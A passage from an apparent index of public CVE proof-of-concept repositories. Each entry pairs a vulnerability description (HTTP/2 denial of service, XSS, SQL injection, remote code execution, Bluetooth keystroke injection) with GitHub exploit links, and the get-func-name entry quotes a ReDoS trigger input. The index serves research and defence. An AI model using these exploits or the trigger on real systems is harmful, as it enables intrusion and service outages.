An attacker, opening a HTTP/2 connection with an initial window size of 0, was able to block handling of that connection indefinitely in Apache HTTP Server. This could be used to exhaust worker resources in the server, similar to the well known "slow loris" attack pattern.\nThis has been fixed in version 2.4.58, so that such connection are terminated properly after the configured connection timeout.\n\nThis issue affects Apache HTTP Server: from 2.4.55 through 2.4.57.\n\nUsers are recommended to upgrade to version 2.4.58, which fixes the issue.\n\n
- [visudade/CVE-2023-43622](https://github.com/visudade/CVE-2023-43622)
### CVE-2023-43646 (2023-09-26)
get-func-name is a module to retrieve a function's name securely and consistently both in NodeJS and the browser. Versions prior to 2.0.1 are subject to a regular expression denial of service (redos) vulnerability which may lead to a denial of service when parsing malicious input. This vulnerability can be exploited when there is an imbalance in parentheses, which results in excessive backtracking and subsequently increases the CPU load and processing time significantly. This vulnerability can be triggered using the following input: '\t'.repeat(54773) + '\t/function/i'. This issue has been addressed in commit `f934b228b` which has been included in releases from 2.0.1. Users are advised to upgrade. There are no known workarounds for this vulnerability.
- [200101WhoAmI/CVE-2023-43646](https://github.com/200101WhoAmI/CVE-2023-43646)
### CVE-2023-43654 (2023-09-28)
TorchServe is a tool for serving and scaling PyTorch models in production. TorchServe default configuration lacks proper input validation, enabling third parties to invoke remote HTTP download requests and write files to the disk. This issue could be taken advantage of to compromise the integrity of the system and sensitive data. This issue is present in versions 0.1.0 to 0.8.1. A user is able to load the model of their choice from any URL that they would like to use. The user of TorchServe is responsible for configuring both the allowed_urls and specifying the model URL to be used. A pull request to warn the user when the default value for allowed_urls is used has been merged in PR #2534. TorchServe release 0.8.2 includes this change. Users are advised to upgrade. There are no known workarounds for this issue.
- [OligoCyberSecurity/ShellTorchChecker](https://github.com/OligoCyberSecurity/ShellTorchChecker)
- [OligoCyberSecurity/CVE-2023-43654](https://github.com/OligoCyberSecurity/CVE-2023-43654)
### CVE-2023-43667 (2023-10-16)
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Apache InLong.This issue affects Apache InLong: from 1.4.0 through 1.8.0, the attacker can create misleading or false records, making it harder to audit\nand trace malicious activities. Users are advised to upgrade to Apache InLong's 1.8.0 or cherry-pick [1] to solve it.\n\n[1] https://github.com/apache/inlong/pull/8628 \n\n
- [miguelc49/CVE-2023-43667-2](https://github.com/miguelc49/CVE-2023-43667-2)
- [miguelc49/CVE-2023-43667-1](https://github.com/miguelc49/CVE-2023-43667-1)
- [miguelc49/CVE-2023-43667-3](https://github.com/miguelc49/CVE-2023-43667-3)
### CVE-2023-43757 (2023-11-16)
Inadequate encryption strength vulnerability in multiple routers provided by ELECOM CO.,LTD. and LOGITEC CORPORATION allows a network-adjacent unauthenticated attacker to guess the encryption key used for wireless LAN communication and intercept the communication. As for the affected products/versions, see the information provided by the vendor under [References] section.
- [sharmashreejaa/CVE-2023-43757](https://github.com/sharmashreejaa/CVE-2023-43757)
### CVE-2023-43770 (2023-09-22)
Roundcube before 1.4.14, 1.5.x before 1.5.4, and 1.6.x before 1.6.3 allows XSS via text/plain e-mail messages with crafted links because of program/lib/Roundcube/rcube_string_replacer.php behavior.
- [s3cb0y/CVE-2023-43770-POC](https://github.com/s3cb0y/CVE-2023-43770-POC)
- [knight0x07/CVE-2023-43770-PoC](https://github.com/knight0x07/CVE-2023-43770-PoC)
### CVE-2023-43786 (2023-10-10)
A vulnerability was found in libX11 due to an infinite loop within the PutSubImage() function. This flaw allows a local user to consume all available system resources and cause a denial of service condition.
- [jfrog/jfrog-CVE-2023-43786-libX11_DoS](https://github.com/jfrog/jfrog-CVE-2023-43786-libX11_DoS)
### CVE-2023-43838 (2023-10-04)
An arbitrary file upload vulnerability in Personal Management System v1.4.64 allows attackers to execute arbitrary code via uploading a crafted SVG file into a user profile's avatar.
- [rootd4ddy/CVE-2023-43838](https://github.com/rootd4ddy/CVE-2023-43838)
### CVE-2023-43871 (2023-09-28)
A File upload vulnerability in WBCE v.1.6.1 allows a local attacker to upload a pdf file with hidden Cross Site Scripting (XSS).
- [sromanhu/CVE-2023-43871-WBCE-Arbitrary-File-Upload--XSS---Media](https://github.com/sromanhu/CVE-2023-43871-WBCE-Arbitrary-File-Upload--XSS---Media)
### CVE-2023-43872 (2023-09-28)
A File upload vulnerability in CMSmadesimple v.2.2.18 allows a local attacker to upload a pdf file with hidden Cross Site Scripting (XSS).
- [sromanhu/CVE-2023-43872-CMSmadesimple-Arbitrary-File-Upload--XSS---File-Manager](https://github.com/sromanhu/CVE-2023-43872-CMSmadesimple-Arbitrary-File-Upload--XSS---File-Manager)
### CVE-2023-43873 (2023-09-28)
A Cross Site Scripting (XSS) vulnerability in e017 CMS v.2.3.2 allows a local attacker to execute arbitrary code via a crafted script to the Name filed in the Manage Menu.
- [sromanhu/CVE-2023-43873-e107-CMS-Stored-XSS---Manage](https://github.com/sromanhu/CVE-2023-43873-e107-CMS-Stored-XSS---Manage)
### CVE-2023-43874 (2023-09-28)
Multiple Cross Site Scripting (XSS) vulnerability in e017 CMS v.2.3.2 allows a local attacker to execute arbitrary code via a crafted script to the Copyright and Author fields in the Meta & Custom Tags Menu.
- [sromanhu/CVE-2023-43874-e107-CMS-Stored-XSS---MetaCustomTags](https://github.com/sromanhu/CVE-2023-43874-e107-CMS-Stored-XSS---MetaCustomTags)
### CVE-2023-43875 (2023-10-19)
Multiple Cross-Site Scripting (XSS) vulnerabilities in installation of Subrion CMS v.4.2.1 allows a local attacker to execute arbitrary web scripts via a crafted payload injected into the dbhost, dbname, dbuser, adminusername and adminemail.
- [sromanhu/CVE-2023-43875-Subrion-CMS-Reflected-XSS---Installation](https://github.com/sromanhu/CVE-2023-43875-Subrion-CMS-Reflected-XSS---Installation)
### CVE-2023-43876 (2023-09-28)
A Cross-Site Scripting (XSS) vulnerability in installation of October v.3.4.16 allows an attacker to execute arbitrary web scripts via a crafted payload injected into the dbhost field.
- [sromanhu/CVE-2023-43876-October-CMS-Reflected-XSS---Installation](https://github.com/sromanhu/CVE-2023-43876-October-CMS-Reflected-XSS---Installation)
### CVE-2023-43877 (2023-10-04)
Rite CMS 3.0 has Multiple Cross-Site scripting (XSS) vulnerabilities that allow attackers to execute arbitrary code via a payload crafted in the Home Page fields in the Administration menu.
- [sromanhu/CVE-2023-43877-RiteCMS-Stored-XSS---Home](https://github.com/sromanhu/CVE-2023-43877-RiteCMS-Stored-XSS---Home)
### CVE-2023-43878 (2023-09-28)
Rite CMS 3.0 has Multiple Cross-Site scripting (XSS) vulnerabilities that allow attackers to execute arbitrary code via a crafted payload into the Main Menu Items in the Administration Menu.
- [sromanhu/CVE-2023-43878-RiteCMS-Stored-XSS---MainMenu](https://github.com/sromanhu/CVE-2023-43878-RiteCMS-Stored-XSS---MainMenu)
### CVE-2023-43879 (2023-09-28)
Rite CMS 3.0 has a Cross-Site scripting (XSS) vulnerability that allows attackers to execute arbitrary code via a crafted payload into the Global Content Blocks in the Administration Menu.
- [sromanhu/CVE-2023-43879-RiteCMS-Stored-XSS---GlobalContent](https://github.com/sromanhu/CVE-2023-43879-RiteCMS-Stored-XSS---GlobalContent)
### CVE-2023-43955 (2023-12-27)
The com.phlox.tvwebbrowser TV Bro application through 2.0.0 for Android mishandles external intents through WebView. This allows attackers to execute arbitrary code, create arbitrary files. and perform arbitrary downloads via JavaScript that uses takeBlobDownloadData.
- [actuator/com.phlox.tvwebbrowser](https://github.com/actuator/com.phlox.tvwebbrowser)
### CVE-2023-44061 (2023-10-06)
File Upload vulnerability in Simple and Nice Shopping Cart Script v.1.0 allows a remote attacker to execute arbitrary code via the upload function in the edit profile component.
- [soundarkutty/CVE-2023-44061](https://github.com/soundarkutty/CVE-2023-44061)
### CVE-2023-44451 (2024-05-03)
Linux Mint Xreader EPUB File Parsing Directory Traversal Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Linux Mint Xreader. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n\nThe specific flaw exists within the parsing of EPUB files. The issue results from the lack of proper validation of a user-supplied path prior to using it in file operations. An attacker can leverage this vulnerability to execute code in the context of the current user. Was ZDI-CAN-21897.
- [febinrev/slippy-book-exploit](https://github.com/febinrev/slippy-book-exploit)
### CVE-2023-44452 (2024-05-03)
Linux Mint Xreader CBT File Parsing Argument Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Linux Mint Xreader. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n\nThe specific flaw exists within the parsing of CBT files. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of the current user. Was ZDI-CAN-22132.
- [febinrev/atril_cbt-inject-exploit](https://github.com/febinrev/atril_cbt-inject-exploit)
### CVE-2023-44487 (2023-10-10)
The HTTP/2 protocol allows a denial of service (server resource consumption) because request cancellation can reset many streams quickly, as exploited in the wild in August through October 2023.
- [bcdannyboy/CVE-2023-44487](https://github.com/bcdannyboy/CVE-2023-44487)
- [imabee101/CVE-2023-44487](https://github.com/imabee101/CVE-2023-44487)
- [ByteHackr/CVE-2023-44487](https://github.com/ByteHackr/CVE-2023-44487)
- [pabloec20/rapidreset](https://github.com/pabloec20/rapidreset)
- [secengjeff/rapidresetclient](https://github.com/secengjeff/rapidresetclient)
- [studiogangster/CVE-2023-44487](https://github.com/studiogangster/CVE-2023-44487)
- [ReToCode/golang-CVE-2023-44487](https://github.com/ReToCode/golang-CVE-2023-44487)
- [ndrscodes/http2-rst-stream-attacker](https://github.com/ndrscodes/http2-rst-stream-attacker)
- [nxenon/cve-2023-44487](https://github.com/nxenon/cve-2023-44487)
- [terrorist/HTTP-2-Rapid-Reset-Client](https://github.com/terrorist/HTTP-2-Rapid-Reset-Client)
- [sigridou/CVE-2023-44487-](https://github.com/sigridou/CVE-2023-44487-)
- [TYuan0816/cve-2023-44487](https://github.com/TYuan0816/cve-2023-44487)
- [sn130hk/CVE-2023-44487](https://github.com/sn130hk/CVE-2023-44487)
### CVE-2023-44758 (2023-10-06)
GDidees CMS 3.0 is affected by a Cross-Site Scripting (XSS) vulnerability that allows attackers to execute arbitrary code via a crafted payload to the Page Title.
- [sromanhu/CVE-2023-44758_GDidees-CMS-Stored-XSS---Title](https://github.com/sromanhu/CVE-2023-44758_GDidees-CMS-Stored-XSS---Title)
### CVE-2023-44760 (2023-10-23)
Multiple Cross Site Scripting (XSS) vulnerabilities in Concrete CMS v.9.2.1 allow an attacker to execute arbitrary code via a crafted script to the Header and Footer Tracking Codes of the SEO & Statistics. NOTE: the vendor disputes this because these header/footer changes can only be made by an admin, and allowing an admin to place JavaScript there is an intentional customization feature. Also, the exploitation method claimed by "sromanhu" does not provide any access to a Concrete CMS session, because the Concrete CMS session cookie is configured as HttpOnly.
- [sromanhu/CVE-2023-44760_ConcreteCMS-Stored-XSS---TrackingCodes](https://github.com/sromanhu/CVE-2023-44760_ConcreteCMS-Stored-XSS---TrackingCodes)
### CVE-2023-44761 (2023-10-06)
Multiple Cross Site Scripting (XSS) vulnerabilities in Concrete CMS versions affected to 8.5.13 and below, and 9.0.0 through 9.2.1 allow a local attacker to execute arbitrary code via a crafted script to the Forms of the Data objects.
- [sromanhu/CVE-2023-44761_ConcreteCMS-Stored-XSS---Forms](https://github.com/sromanhu/CVE-2023-44761_ConcreteCMS-Stored-XSS---Forms)
### CVE-2023-44762 (2023-10-06)
A Cross Site Scripting (XSS) vulnerability in Concrete CMS from versions 9.2.0 to 9.2.2 allows an attacker to execute arbitrary code via a crafted script to the Tags from Settings - Tags.
- [sromanhu/CVE-2023-44762_ConcreteCMS-Reflected-XSS---Tags](https://github.com/sromanhu/CVE-2023-44762_ConcreteCMS-Reflected-XSS---Tags)
### CVE-2023-44763 (2023-10-10)
Concrete CMS v9.2.1 is affected by an Arbitrary File Upload vulnerability via a Thumbnail file upload, which allows Cross-Site Scripting (XSS). NOTE: the vendor's position is that a customer is supposed to know that "pdf" should be excluded from the allowed file types, even though pdf is one of the allowed file types in the default configuration.
- [sromanhu/CVE-2023-44763_ConcreteCMS-Arbitrary-file-upload-Thumbnail](https://github.com/sromanhu/CVE-2023-44763_ConcreteCMS-Arbitrary-file-upload-Thumbnail)
### CVE-2023-44764 (2023-10-06)
A Cross Site Scripting (XSS) vulnerability in Concrete CMS before 9.2.3 exists via the Name parameter during installation (aka Site of Installation or Settings).
- [sromanhu/CVE-2023-44764_ConcreteCMS-Stored-XSS---Site_Installation](https://github.com/sromanhu/CVE-2023-44764_ConcreteCMS-Stored-XSS---Site_Installation)
### CVE-2023-44765 (2023-10-06)
A Cross Site Scripting (XSS) vulnerability in Concrete CMS versions 8.5.12 and below, and 9.0 through 9.2.1 allows an attacker to execute arbitrary code via a crafted script to Plural Handle of the Data Objects from System & Settings.
- [sromanhu/CVE-2023-44765_ConcreteCMS-Stored-XSS---Associations](https://github.com/sromanhu/CVE-2023-44765_ConcreteCMS-Stored-XSS---Associations)
### CVE-2023-44766 (2023-10-06)
A Cross Site Scripting (XSS) vulnerability in Concrete CMS v.9.2.1 allows an attacker to execute arbitrary code via a crafted script to the SEO - Extra from Page Settings. NOTE: the vendor disputes this because this SEO-related header change can only be made by an admin, and allowing an admin to place JavaScript there is an intentional customization feature.
- [sromanhu/CVE-2023-44766_ConcreteCMS-Stored-XSS---SEO](https://github.com/sromanhu/CVE-2023-44766_ConcreteCMS-Stored-XSS---SEO)
### CVE-2023-44767 (2023-10-24)
A File upload vulnerability in RiteCMS 3.0 allows a local attacker to upload a SVG file with XSS content.
- [sromanhu/CVE-2023-44767_RiteCMS-File-Upload--XSS---Filemanager](https://github.com/sromanhu/CVE-2023-44767_RiteCMS-File-Upload--XSS---Filemanager)
### CVE-2023-44769 (2023-10-24)
A Cross-Site Scripting (XSS) vulnerability in Zenario CMS v.9.4.59197 allows a local attacker to execute arbitrary code via a crafted script to the Spare aliases from Alias.
- [sromanhu/CVE-2023-44769_ZenarioCMS--Reflected-XSS---Alias](https://github.com/sromanhu/CVE-2023-44769_ZenarioCMS--Reflected-XSS---Alias)
### CVE-2023-44770 (2023-10-06)
A Cross-Site Scripting (XSS) vulnerability in Zenario CMS v.9.4.59197 allows an attacker to execute arbitrary code via a crafted script to the Organizer - Spare alias.
- [sromanhu/CVE-2023-44770_ZenarioCMS--Reflected-XSS---Organizer-Alias](https://github.com/sromanhu/CVE-2023-44770_ZenarioCMS--Reflected-XSS---Organizer-Alias)
### CVE-2023-44771 (2023-10-06)
A Cross-Site Scripting (XSS) vulnerability in Zenario CMS v.9.4.59197 allows a local attacker to execute arbitrary code via a crafted script to the Page Layout.
- [sromanhu/CVE-2023-44771_ZenarioCMS--Stored-XSS---Page-Layout](https://github.com/sromanhu/CVE-2023-44771_ZenarioCMS--Stored-XSS---Page-Layout)
### CVE-2023-44811 (2023-10-09)
Cross Site Request Forgery (CSRF) vulnerability in MooSocial v.3.1.8 allows a remote attacker to execute arbitrary code and obtain sensitive information via the admin Password Change Function.
- [ahrixia/CVE-2023-44811](https://github.com/ahrixia/CVE-2023-44811)
### CVE-2023-44812 (2023-10-09)
Cross Site Scripting (XSS) vulnerability in mooSocial v.3.1.8 allows a remote attacker to execute arbitrary code via a crafted payload to the admin_redirect_url parameter of the user login function.
- [ahrixia/CVE-2023-44812](https://github.com/ahrixia/CVE-2023-44812)
### CVE-2023-44813 (2023-10-09)
Cross Site Scripting (XSS) vulnerability in mooSocial v.3.1.8 allows a remote attacker to execute arbitrary code via a crafted payload to the mode parameter of the invite friend login function.
- [ahrixia/CVE-2023-44813](https://github.com/ahrixia/CVE-2023-44813)
### CVE-2023-44961 (2023-10-11)
SQL Injection vulnerability in Koha Library Software 23.0.5.04 and before allows a remote attacker to obtain sensitive information via the intranet/cgi bin/cataloging/ysearch.pl. component.
- [ggb0n/CVE-2023-44961](https://github.com/ggb0n/CVE-2023-44961)
### CVE-2023-44962 (2023-10-11)
File Upload vulnerability in Koha Library Software 23.05.04 and before allows a remote attacker to read arbitrary files via the upload-cover-image.pl component.
- [ggb0n/CVE-2023-44962](https://github.com/ggb0n/CVE-2023-44962)
### CVE-2023-44976
- [keowu/BadRentdrv2](https://github.com/keowu/BadRentdrv2)
### CVE-2023-45158 (2023-10-16)
An OS command injection vulnerability exists in web2py 2.24.1 and earlier. When the product is configured to use notifySendHandler for logging (not the default configuration), a crafted web request may execute an arbitrary OS command on the web server using the product.
- [Evan-Zhangyf/CVE-2023-45158](https://github.com/Evan-Zhangyf/CVE-2023-45158)
### CVE-2023-45182 (2023-12-14)
\nIBM i Access Client Solutions 1.1.2 through 1.1.4 and 1.1.4.3 through 1.1.9.3 is vulnerable to having its key for an encrypted password decoded. By somehow gaining access to the encrypted password, a local attacker could exploit this vulnerability to obtain the password to other systems. IBM X-Force ID: 268265.\n\n
- [afine-com/CVE-2023-45182](https://github.com/afine-com/CVE-2023-45182)
### CVE-2023-45184 (2023-12-14)
IBM i Access Client Solutions 1.1.2 through 1.1.4 and 1.1.4.3 through 1.1.9.3 could allow an attacker to obtain a decryption key due to improper authority checks. IBM X-Force ID: 268270.
- [afine-com/CVE-2023-45184](https://github.com/afine-com/CVE-2023-45184)
### CVE-2023-45185 (2023-12-14)
IBM i Access Client Solutions 1.1.2 through 1.1.4 and 1.1.4.3 through 1.1.9.3 could allow an attacker to execute remote code. Due to improper authority checks the attacker could perform operations on the PC under the user's authority. IBM X-Force ID: 268273.
- [afine-com/CVE-2023-45185](https://github.com/afine-com/CVE-2023-45185)
### CVE-2023-45239 (2023-10-06)
A lack of input validation exists in tac_plus prior to commit 4fdf178 which, when pre or post auth commands are enabled, allows an attacker who can control the username, rem-addr, or NAC address sent to tac_plus to inject shell commands and gain remote code execution on the tac_plus server.
- [takeshixx/tac_plus-pre-auth-rce](https://github.com/takeshixx/tac_plus-pre-auth-rce)
### CVE-2023-45280 (2023-10-19)
Yamcs 5.8.6 allows XSS (issue 2 of 2). It comes with a Bucket as its primary storage mechanism. Buckets allow for the upload of any file. There's a way to upload an HTML file containing arbitrary JavaScript and then navigate to it. Once the user opens the file, the browser will execute the arbitrary JavaScript.
- [miguelc49/CVE-2023-45280-1](https://github.com/miguelc49/CVE-2023-45280-1)
- [miguelc49/CVE-2023-45280-3](https://github.com/miguelc49/CVE-2023-45280-3)
- [miguelc49/CVE-2023-45280-2](https://github.com/miguelc49/CVE-2023-45280-2)
### CVE-2023-45288 (2024-04-04)
An attacker may cause an HTTP/2 endpoint to read arbitrary amounts of header data by sending an excessive number of CONTINUATION frames. Maintaining HPACK state requires parsing and processing all HEADERS and CONTINUATION frames on a connection. When a request's headers exceed MaxHeaderBytes, no memory is allocated to store the excess headers, but they are still parsed. This permits an attacker to cause an HTTP/2 endpoint to read arbitrary amounts of header data, all associated with a request which is going to be rejected. These headers can include Huffman-encoded data which is significantly more expensive for the receiver to decode than for an attacker to send. The fix sets a limit on the amount of excess header frames we will process before closing a connection.
- [hex0punk/cont-flood-poc](https://github.com/hex0punk/cont-flood-poc)
### CVE-2023-45471 (2023-10-20)
The QAD Search Server is vulnerable to Stored Cross-Site Scripting (XSS) in versions up to, and including, 1.0.0.315 due to insufficient checks on indexes. This makes it possible for unauthenticated attackers to create a new index and inject a malicious web script into its name, that will execute whenever a user accesses the search page.
- [mehdibelhajamor/CVE-2023-45471](https://github.com/mehdibelhajamor/CVE-2023-45471)
### CVE-2023-45503 (2024-04-15)
SQL Injection vulnerability in Macrob7 Macs CMS 1.1.4f, allows remote attackers to execute arbitrary code, cause a denial of service (DoS), escalate privileges, and obtain sensitive information via crafted payload to resetPassword, forgotPasswordProcess, saveUser, saveRole, deleteUser, deleteRole, deleteComment, deleteUser, allowComment, saveRole, forgotPasswordProcess, resetPassword, saveUser, addComment, saveRole, and saveUser endpoints.
- [ally-petitt/CVE-2023-45503](https://github.com/ally-petitt/CVE-2023-45503)
### CVE-2023-45540 (2023-10-16)
An issue in Jorani Leave Management System 1.0.3 allows a remote attacker to execute arbitrary HTML code via a crafted script to the comment field of the List of Leave requests page.
- [soundarkutty/CVE-2023-45540](https://github.com/soundarkutty/CVE-2023-45540)
### CVE-2023-45542 (2023-10-16)
Cross Site Scripting vulnerability in mooSocial 3.1.8 allows a remote attacker to obtain sensitive information via a crafted script to the q parameter in the Search function.
- [ahrixia/CVE-2023-45542](https://github.com/ahrixia/CVE-2023-45542)
### CVE-2023-45657 (2023-11-06)
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in POSIMYTH Nexter allows SQL Injection.This issue affects Nexter: from n/a through 2.0.3.\n\n
- [RandomRobbieBF/CVE-2023-45657](https://github.com/RandomRobbieBF/CVE-2023-45657)
### CVE-2023-45777 (2023-12-04)
In checkKeyIntentParceledCorrectly of AccountManagerService.java, there is a possible way to launch arbitrary activities using system privileges due to Parcel Mismatch. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.
- [michalbednarski/TheLastBundleMismatch](https://github.com/michalbednarski/TheLastBundleMismatch)
### CVE-2023-45779 (2023-12-04)
In the APEX module framework of AOSP, there is a possible malicious update to platform components due to improperly used crypto. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. More details on this can be found in the referenced links.\n
- [metaredteam/rtx-cve-2023-45779](https://github.com/metaredteam/rtx-cve-2023-45779)
### CVE-2023-45827 (2023-11-06)
Dot diver is a lightweight, powerful, and dependency-free TypeScript utility library that provides types and functions to work with object paths in dot notation. In versions prior to 1.0.2 there is a Prototype Pollution vulnerability in the `setByPath` function which can leads to remote code execution (RCE). This issue has been addressed in commit `98daf567` which has been included in release 1.0.2. Users are advised to upgrade. There are no known workarounds to this vulnerability.\n
- [200101WhoAmI/CVE-2023-45827](https://github.com/200101WhoAmI/CVE-2023-45827)
### CVE-2023-45828
- [RandomRobbieBF/CVE-2023-45828](https://github.com/RandomRobbieBF/CVE-2023-45828)
### CVE-2023-45857 (2023-11-08)
An issue discovered in Axios 1.5.1 inadvertently reveals the confidential XSRF-TOKEN stored in cookies by including it in the HTTP header X-XSRF-TOKEN for every request made to any host allowing attackers to view sensitive information.
- [valentin-panov/CVE-2023-45857](https://github.com/valentin-panov/CVE-2023-45857)
- [intercept6/CVE-2023-45857-Demo](https://github.com/intercept6/CVE-2023-45857-Demo)
- [fuyuooumi1027/CVE-2023-45857-Demo](https://github.com/fuyuooumi1027/CVE-2023-45857-Demo)
### CVE-2023-45866 (2023-12-08)
Bluetooth HID Hosts in BlueZ may permit an unauthenticated Peripheral role HID Device to initiate and establish an encrypted connection, and accept HID keyboard reports, potentially permitting injection of HID messages when no user interaction has occurred in the Central role to authorize such access. An example affected package is bluez 5.64-0ubuntu1 in Ubuntu 22.04LTS. NOTE: in some cases, a CVE-2020-0556 mitigation would have already addressed this Bluetooth HID Hosts issue.
- [pentestfunctions/BlueDucky](https://github.com/pentestfunctions/BlueDucky)
- [Eason-zz/BluetoothDucky](https://github.com/Eason-zz/BluetoothDucky)
- [jjjjjjjj987/cve-2023-45866-py](https://github.com/jjjjjjjj987/cve-2023-45866-py)
- [cisnarfu/Bluepop](https://github.com/cisnarfu/Bluepop)
- [AvishekDhakal/CVE-2023-45866_EXPLOITS](https://github.com/AvishekDhakal/CVE-2023-45866_EXPLOITS)
- [Chedrian07/CVE-2023-45866-POC](https://github.com/Chedrian07/CVE-2023-45866-POC)
### CVE-2023-45966 (2023-10-23)
umputun remark42 version 1.12.1 and before has a Blind Server-Side Request Forgery (SSRF) vulnerability.
- [jet-pentest/CVE-2023-45966](https://github.com/jet-pentest/CVE-2023-45966)
### CVE-2023-45992 (2023-10-19)
A vulnerability in the web-based interface of the RUCKUS Cloudpath product on version 5.12 build 5538 or before to could allow a remote, unauthenticated attacker to execute persistent XSS and CSRF attacks against a user of the admin management interface. A successful attack, combined with a certain admin activity, could allow the attacker to gain full admin privileges on the exploited system.
- [harry935/CVE-2023-45992](https://github.com/harry935/CVE-2023-45992)
### CVE-2023-46003 (2023-10-21)
I-doit pro 25 and below is vulnerable to Cross Site Scripting (XSS) via index.php.
- [leekenghwa/CVE-2023-46003](https://github.com/leekenghwa/CVE-2023-46003)
### CVE-2023-46012 (2024-05-07)
Buffer Overflow vulnerability LINKSYS EA7500 3.0.1.207964 allows a remote attacker to execute arbitrary code via an HTTP request to the IGD UPnP.
- [dest-3/CVE-2023-46012](https://github.com/dest-3/CVE-2023-46012)
### CVE-2023-46014 (2023-11-13)
SQL Injection vulnerability in hospitalLogin.php in Code-Projects Blood Bank 1.0 allows attackers to run arbitrary SQL commands via 'hemail' and 'hpassword' parameters.
- [ersinerenler/CVE-2023-46014-Code-Projects-Blood-Bank-1.0-SQL-Injection-Vulnerability](https://github.com/ersinerenler/CVE-2023-46014-Code-Projects-Blood-Bank-1.0-SQL-Injection-Vulnerability)
### CVE-2023-46015 (2023-11-13)
Cross Site Scripting (XSS) vulnerability in index.php in Code-Projects Blood Bank 1.0 allows attackers to run arbitrary code via 'msg' parameter in application URL.
- [ersinerenler/CVE-2023-46015-Code-Projects-Blood-Bank-1.0-Reflected-Cross-Site-Scripting-Vulnerability](https://github.com/ersinerenler/CVE-2023-46015-Code-Projects-Blood-Bank-1.0-Reflected-Cross-Site-Scripting-Vulnerability)
### CVE-2023-46016 (2023-11-13)
Cross Site Scripting (XSS) in abs.php in Code-Projects Blood Bank 1.0 allows attackers to run arbitrary code via the 'search' parameter in the application URL.
- [ersinerenler/CVE-2023-46016-Code-Projects-Blood-Bank-1.0-Reflected-Cross-Site-Scripting-Vulnerability](https://github.com/ersinerenler/CVE-2023-46016-Code-Projects-Blood-Bank-1.0-Reflected-Cross-Site-Scripting-Vulnerability)
### CVE-2023-46017 (2023-11-13)
SQL Injection vulnerability in receiverLogin.php in Code-Projects Blood Bank 1.0 allows attackers to run arbitrary SQL commands via 'remail' and 'rpassword' parameters.
- [ersinerenler/CVE-2023-46017-Code-Projects-Blood-Bank-1.0-SQL-Injection-Vulnerability](https://github.com/ersinerenler/CVE-2023-46017-Code-Projects-Blood-Bank-1.0-SQL-Injection-Vulnerability)
### CVE-2023-46018 (2023-11-13)
SQL injection vulnerability in receiverReg.php in Code-Projects Blood Bank 1.0 \allows attackers to run arbitrary SQL commands via 'remail' parameter.
- [ersinerenler/CVE-2023-46018-Code-Projects-Blood-Bank-1.0-SQL-Injection-Vulnerability](https://github.com/ersinerenler/CVE-2023-46018-Code-Projects-Blood-Bank-1.0-SQL-Injection-Vulnerability)
### CVE-2023-46019 (2023-11-13)
Cross Site Scripting (XSS) vulnerability in abs.php in Code-Projects Blood Bank 1.0 allows attackers to run arbitrary code via the 'error' parameter.
- [ersinerenler/CVE-2023-46019-Code-Projects-Blood-Bank-1.0-Reflected-Cross-Site-Scripting-Vulnerability](https://github.com/ersinerenler/CVE-2023-46019-Code-Projects-Blood-Bank-1.0-Reflected-Cross-Site-Scripting-Vulnerability)
### CVE-2023-46020 (2023-11-13)
Cross Site Scripting (XSS) in updateprofile.php in Code-Projects Blood Bank 1.0 allows attackers to run arbitrary code via the 'rename', 'remail', 'rphone' and 'rcity' parameters.
- [ersinerenler/CVE-2023-46020-Code-Projects-Blood-Bank-1.0-Stored-Cross-Site-Scripting-Vulnerability](https://github.com/ersinerenler/CVE-2023-46020-Code-Projects-Blood-Bank-1.0-Stored-Cross-Site-Scripting-Vulnerability)
### CVE-2023-46021 (2023-11-13)
SQL Injection vulnerability in cancel.php in Code-Projects Blood Bank 1.0 allows attackers to run arbitrary commands via the 'reqid' parameter.
- [ersinerenler/CVE-2023-46021-Code-Projects-Blood-Bank-1.0-SQL-Injection-Vulnerability](https://github.com/ersinerenler/CVE-2023-46021-Code-Projects-Blood-Bank-1.0-SQL-Injection-Vulnerability)
### CVE-2023-46022 (2023-11-14)
SQL Injection vulnerability in delete.php in Code-Projects Blood Bank 1.0 allows attackers to run arbitrary SQL commands via the 'bid' parameter.
- [ersinerenler/CVE-2023-46022-Code-Projects-Blood-Bank-1.0-OOB-SQL-Injection-Vulnerability](https://github.com/ersinerenler/CVE-2023-46022-Code-Projects-Blood-Bank-1.0-OOB-SQL-Injection-Vulnerability)
### CVE-2023-46197 (2024-05-17)
Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in supsystic.Com Popup by Supsystic allows Relative Path Traversal.This issue affects Popup by Supsystic: from n/a through 1.10.19.
- [RandomRobbieBF/CVE-2023-46197](https://github.com/RandomRobbieBF/CVE-2023-46197)
### CVE-2023-46303 (2023-10-22)
link_to_local_path in ebooks/conversion/plugins/html_input.py in calibre before 6.19.0 can, by default, add resources outside of the document root.
- [0x1717/ssrf-via-img](https://github.com/0x1717/ssrf-via-img)
### CVE-2023-46304 (2024-04-30)
modules/Users/models/Module.php in Vtiger CRM 7.5.0 allows a remote authenticated attacker to run arbitrary PHP code because an unprotected endpoint allows them to write this code to the config.inc.php file (executed on every page load).
- [jselliott/CVE-2023-46304](https://github.com/jselliott/CVE-2023-46304)
### CVE-2023-46344 (2024-02-02)
A vulnerability in Solar-Log Base 15 Firmware 6.0.1 Build 161, and possibly other Solar-Log Base products, allows an attacker to escalate their privileges by exploiting a stored cross-site scripting (XSS) vulnerability in the switch group function under /#ilang=DE&b=c_smartenergy_swgroups in the web portal. The vulnerability can be exploited to gain the rights of an installer or PM, which can then be used to gain administrative access to the web portal and execute further attacks.
- [vinnie1717/CVE-2023-46344](https://github.com/vinnie1717/CVE-2023-46344)
### CVE-2023-46371 (2023-10-24)
TP-Link device TL-WDR7660 2.0.30 and TL-WR886N 2.0.12 has a stack overflow vulnerability via the function upgradeInfoJsonToBin.
- [Jianchun-Ding/CVE-poc-update](https://github.com/Jianchun-Ding/CVE-poc-update)
### CVE-2023-46404 (2023-11-03)
